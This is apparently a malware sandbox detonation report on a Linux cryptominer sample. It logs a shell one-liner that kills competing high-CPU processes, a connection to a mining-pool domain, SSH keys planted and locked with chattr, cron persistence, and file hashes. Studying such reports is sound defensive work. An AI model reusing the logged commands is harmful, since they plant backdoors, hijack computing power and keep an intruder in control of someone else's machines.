[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi fi]
/usr/bin/id
[id -u]
/usr/bin/wc
[wc -l]
/usr/bin/awk
[awk {if($3>30.0) print $2}]
/usr/bin/grep
[grep -- -bash[[:space:]]*$]
/usr/bin/grep
[grep -v grep]
/usr/bin/ps
[ps aux]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | xmr-rx0.pwndns.pw | udp |
| US | 1.1.1.1:53 | xmr-rx0.pwndns.pw | udp |
| FR | 51.210.15.231:80 | xmr-rx0.pwndns.pw | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
Files
/tmp/.update/.cron
| MD5 | 9814e9c19a7304358742e3553bd73ea7 |
| SHA1 | 88d43c112af907d972b1f1e2f49632f8ca004864 |
| SHA256 | 9941b828f1984f2a85ba06f5eca0d7c22c9519cb8f09b43bf9930f6174f01b6d |
| SHA512 | eb8ff6cd01f8100b78b579d732ec264976bc3378130b1535bea4553a8347cf445c5654adc58fea55341d9c22ad29872d5d9f85fd8bc6291bc449359ec4e34d9f |
/var/spool/cron/crontabs/tmp.6m5OSD
| MD5 | 964b07829b4f71b67d83a0ac24db1cab |
| SHA1 | bf052205fa7870a5b2ebb4141a4bb604ccecf435 |
| SHA256 | af81703b357640390737fb2e4df7d99dfc26935fd0d454b53440a70c7b70333b |
| SHA512 | d44502a0c0908f5aeb8f5899fe7c26232e2563d1ba72a26bf32d5973513afcd5c5af321b047d62d1d36c393385a7d285d59b91869535cf9c350075408d6aea1b |
Analysis: behavioral31
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsbe-20240611-en
Max time kernel
2s
Command Line
Signatures
Adds new SSH keys
| Description | Indicator | Process | Target |
| File opened for modification | /root/.ssh/authorized_keys | /tmp/.update/auth | N/A |
| File opened for modification | /home/user/.ssh/authorized_keys | /tmp/.update/auth | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/authusers | /tmp/.update/auth | N/A |
Processes
/tmp/.update/auth
[/tmp/.update/auth]
/bin/uname
[uname -n]
/bin/mkdir
[mkdir /root/.ssh]
/bin/chmod
[chmod 0700 /root/.ssh]
/bin/chmod
[chmod 0644 /root/.ssh/authorized_keys]
/usr/bin/chattr
[chattr +ai /root/.ssh /root/.ssh/authorized_keys]
/bin/rm
[rm -rf authusers]
/bin/grep
[grep -e /bin/sh -e /bin/bash]
/bin/cat
[cat /etc/passwd]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/usr/bin/chattr
[chattr -ai /root/.ssh /root/.ssh/authorized_keys]
/bin/sed
[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/bin/mkdir
[mkdir /home/user/.ssh]
/bin/chown
[chown -R user /home/user/.ssh]
Network
Files
/root/.ssh/authorized_keys
| MD5 | 5841342e6d1bcae6dcfea6cc9326a684 |
| SHA1 | fea6d85939bb87ee27c30f670087ff0db740751c |
| SHA256 | fb7dc97bdf7c5f4a74b2a0aa602a13c06ecadf99aeb1206dc86da38a7a75c6af |
| SHA512 | 116d63c20881320d0d76ab99300dbcf9146cf890d8b6c6c3769bc62cfbff88aba8d1d6d7ca0e39507a769251335251495e1246487fe8173f454e619535aadb33 |
/tmp/.update/authusers
| MD5 | 9514cd886e4faf1f23baadfd967abcbd |
| SHA1 | 00894ed21cee494a192e94a782ae265e45d828f1 |
| SHA256 | 6b6a14023ccb73d8e3ae440f372d66866d50ecd2141acc8cd947e29fd088d432 |
| SHA512 | 17fb1a18e12a6c04f960d4c54d00100ebd87c20976bd98bb8d8b242725519ce3968ad9312472dfafc4e67e46a9eddba4a993511ec557035f09d94b7548c50ce6 |
/tmp/.update/authusers
| MD5 | fe065880cc6e0333e8679d0e03ff2369 |
| SHA1 | aaceb9f893c93f47ddccca1e2e502c01ecbc5456 |
| SHA256 | f06caf37e0abb7fe702087801c3ef6507d69560d1992dc4f3a2e788e70a37a77 |
| SHA512 | ccbe5ac641458e053b073b3cc9ebb5be2c086a5ec76ff46f36f8373a64e3964b6a1953a4165a6cd1b0cda52a3aed0f6227d4bec8f0370169bd68ed09e2a02e92 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsel-20240611-en
Max time kernel
2s
Command Line
Signatures
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/79/status | /bin/ps | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /bin/ps | N/A |
| File opened for reading | /proc/317/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/167/stat | /bin/ps | N/A |
| File opened for reading | /proc/729/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/732/stat | /bin/ps | N/A |
| File opened for reading | /proc/9/status | /bin/ps | N/A |
| File opened for reading | /proc/150/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/24/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/722/stat | /bin/ps | N/A |
| File opened for reading | /proc/2/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/24/stat | /bin/ps | N/A |
| File opened for reading | /proc/15/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/22/stat | /bin/ps | N/A |
| File opened for reading | /proc/82/status | /bin/ps | N/A |
| File opened for reading | /proc/345/stat | /bin/ps | N/A |
| File opened for reading | /proc/9/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/13/status | /bin/ps | N/A |
| File opened for reading | /proc/376/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/14/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/79/status | /bin/ps | N/A |
| File opened for reading | /proc/732/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/318/status | /bin/ps | N/A |
| File opened for reading | /proc/66/status | /bin/ps | N/A |
| File opened for reading | /proc/368/stat | /bin/ps | N/A |
| File opened for reading | /proc/105/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/70/status | /bin/ps | N/A |
| File opened for reading | /proc/230/stat | /bin/ps | N/A |
| File opened for reading | /proc/727/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/14/status | /bin/ps | N/A |
| File opened for reading | /proc/19/status | /bin/ps | N/A |
| File opened for reading | /proc/68/status | /bin/ps | N/A |
| File opened for reading | /proc/9/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/741/status | /bin/ps | N/A |
| File opened for reading | /proc/filesystems | /bin/ps | N/A |
| File opened for reading | /proc/105/stat | /bin/ps | N/A |
| File opened for reading | /proc/736/status | /bin/ps | N/A |
| File opened for reading | /proc/12/status | /bin/ps | N/A |
| File opened for reading | /proc/115/stat | /bin/ps | N/A |
| File opened for reading | /proc/76/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/138/status | /bin/ps | N/A |
| File opened for reading | /proc/15/status | /bin/ps | N/A |
| File opened for reading | /proc/21/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/36/stat | /bin/ps | N/A |
| File opened for reading | /proc/740/status | /bin/ps | N/A |
| File opened for reading | /proc/78/stat | /bin/ps | N/A |
| File opened for reading | /proc/657/stat | /bin/ps | N/A |
| File opened for reading | /proc/115/stat | /bin/ps | N/A |
| File opened for reading | /proc/698/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/716/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/11/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/6/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/3/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/669/status | /bin/ps | N/A |
| File opened for reading | /proc/660/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/76/stat | /bin/ps | N/A |
| File opened for reading | /proc/36/stat | /bin/ps | N/A |
| File opened for reading | /proc/78/status | /bin/ps | N/A |
| File opened for reading | /proc/138/status | /bin/ps | N/A |
| File opened for reading | /proc/376/stat | /bin/ps | N/A |
| File opened for reading | /proc/16/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/7/status | /bin/ps | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cp | N/A |
Processes
/tmp/.systemd/.run
[/tmp/.systemd/.run]
/bin/grep
[grep ssh ]
/bin/grep
[grep -v R]
/bin/ps
[ps x]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/ps
[ps x]
/bin/grep
[grep ssh$]
/bin/grep
[grep -v R]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/grep
[grep -v R]
/bin/grep
[grep -v grep]
/bin/grep
[grep sh$]
/usr/bin/awk
[awk {print $1}]
/bin/ps
[ps x]
/bin/uname
[uname -m]
/bin/cp
[cp -f -- .mips -bash]
/tmp/.systemd/-bash
[./-bash]
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-armhf-20240611-en
Max time kernel
1s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.RBTJla | /usr/bin/crontab | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/systemd.d | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/.systemd | /tmp/.systemd/auto | N/A |
Processes
/tmp/.systemd/auto
[/tmp/.systemd/auto]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/usr/bin/crontab
[crontab -l]
/bin/grep
[grep .systemd]
/usr/bin/wc
[wc -l]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab systemd.d]
/bin/rm
[rm -rf systemd.d]
/bin/chmod
[chmod u+x .systemd]
Network
Files
/tmp/.systemd/systemd.dir
| MD5 | 1f3a48ead214b69a4e5bbcc12a732ddb |
| SHA1 | 3391a93f27a805c58de438e5a50267af13b619ab |
| SHA256 | 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c |
| SHA512 | 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d |
/var/spool/cron/crontabs/tmp.RBTJla
| MD5 | dbb47228523c48edfe60dda1b012f03d |
| SHA1 | 64adf38fbd662f2cdc856b0a1a1898d60d2e5c14 |
| SHA256 | 0985d86b6a0b52111095135d4a0e5405848d42318445492d6540784bfc61f30e |
| SHA512 | a720fc83063c925b735443be41ae8857d342c1a6dd64afe3463b6c9c64c35e4725641d3db5dd5ce7f22fc965e77d5218fb0903c592c51c777992e59b9419a287 |
/tmp/.systemd/.systemd
| MD5 | 20abc8e72d4066c0565f7bbfad0fe526 |
| SHA1 | 10cb464b8e9401cb3bfe17e059c957d79f4a93dd |
| SHA256 | 579de93e6119bdd4eb948bbdc32b0a3340bab93d4d0b5db723dbc5dddf82b09b |
| SHA512 | 9d849197900f20993624e5b713b24c72ffd269b078a7fc8574211258899bc70ddc85f00259d5f6aa3b032bcc0ec687524f042b6fed5e4fa96781d03a858ac977 |